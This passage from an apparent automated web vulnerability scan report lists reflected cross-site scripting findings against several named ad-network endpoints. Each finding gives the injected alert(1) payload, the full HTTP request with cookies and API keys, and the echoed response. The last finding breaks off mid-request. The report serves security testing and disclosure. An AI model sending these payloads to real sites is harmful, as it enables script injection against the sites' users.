9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:26 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:26 GMT
Pragma: no-cache
Content-Length: 4673
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?8994d"-alert(1)-"ce7be5c493=1&Z=728x90&s=806254&_salt=2462607345";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

3.34. http://ads.adap.tv/beacons [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a1f27<script>alert(1)</script>021458ba7c7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacons?callback=jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7 HTTP/1.1
Host: ads.adap.tv
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-05-10+07%3A22%3A29"; rtbData0="key=turn:value=4146544210108361256:expiresAt=Thu+Jul+28+06%3A37%3A58+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="7419174845235780020__TIME__2011-07-22+21%3A48%3A45";Path=/;Domain=.adap.tv;Expires=Tue, 31-Mar-43 06:35:25 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 792

jsonp1311396514352a1f27<script>alert(1)</script>021458ba7c7({
   "beacons":["http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pix04.revsci.net/A11149/a4/0/0/123.302?tgt=http%3A%2F%2Fsegments.adap.tv%2Fdata%2F%3Fp%3Daudiencescience%26t
...[SNIP]...

3.35. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The value of the AdId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1753f"-alert(1)-"39746e769c6 was submitted in the AdId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2220
Set-Cookie: 28969=ADCAD0B8.1C14A0.1.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
edia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?1753f"-alert(1)-"39746e769c6http://www.smiletrain.org?s_src=BANNER_BostonGlobe12&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.36. http://adserver.adtechus.com/addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8501"-alert(1)-"733d4dc846b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C5298.1%7C1375467%7C0%7C154%7CADTECH;AdId=1840288;BnId=-1;;loc=100;target=_blank;misc=1921254557;rdclick=http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DDA4C606E651A440C6EAF39F00041BC

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Content-Length: 2212
Set-Cookie: 28969=ADCAD0B8.1C14A0.2.14FCEB.2.0.4E2AD12F.1C0F21.13705BE.14B2.1;expires=Sat, 30 Jul 2011 13:48:31 GMT;domain=adserver.adtechus.com;path=/

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
dia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?&f8501"-alert(1)-"733d4dc846b=1http://www.smiletrain.org?s_src=BANNER_BostonGlobe01&utm_source=Boston&utm_campaign=valueadd&utm_medium=display\" target=\"_blank\">
...[SNIP]...

3.37. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 8e28a<script>alert(1)</script>86b474bc84f was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sat, 23 Jul 2011 04:31:19 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1I9O39eYN6IlExkNK7HUtFp4B4dlWpgdhVexhDCjVbgz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData8e28a<script>alert(1)</script>86b474bc84f({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.38. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 7d991<script>alert(1)</script>e4631ba329e was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=tpCKokqYoGQhUXUii5DtcSNQb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2GokttNiptM6FExkNK7HUtFp4B4dlWpgdhSIRMejJJHYD8l3ZY0x538oYYx7zFKAiiaQIFsisgNSNyapcheyl9qqj5isLeKJDB2UPGjg3vXDjpIpvQ2ul4q8MQQAdGRQisgNGpunspyGhHwpKMTlyYtq6Za6UAkBPsFfYeuxE6rBNXvlsMJ7hbaahMwGHWJy7cP8bcdojm5is3wEUThITfFDIipF2rkN6WsamcD5VW1iiLhR1ipFUs24V52t2cN1qss1vBdTs9TcInbC13AzyJVMisQS3uIkipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisHP1G6sC1FckSLE2C8oCp9uCwcaIYpAt5zvJh0QDyipWUVtAQ9nxHLCs8DdoSbabpX; BizoNetworkPartnerIndex=3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 04:31:21 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun7d991<script>alert(1)</script>e4631ba329e)

3.39. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 1ffb0<script>alert(1)</script>08b494b6eae was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=53%26sei=21%26sci=1%26sai=0%26smi=0%26pbi=0%26sts=1311428797730419%26sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0awupiiJtt7A1ExkNK7HUtFp4B4dlWpgdgfBIoZ4uj4Tz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:15 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae)

3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a0894<script>alert(1)</script>80c70e92325 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=a0894<script>alert(1)</script>80c70e92325 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
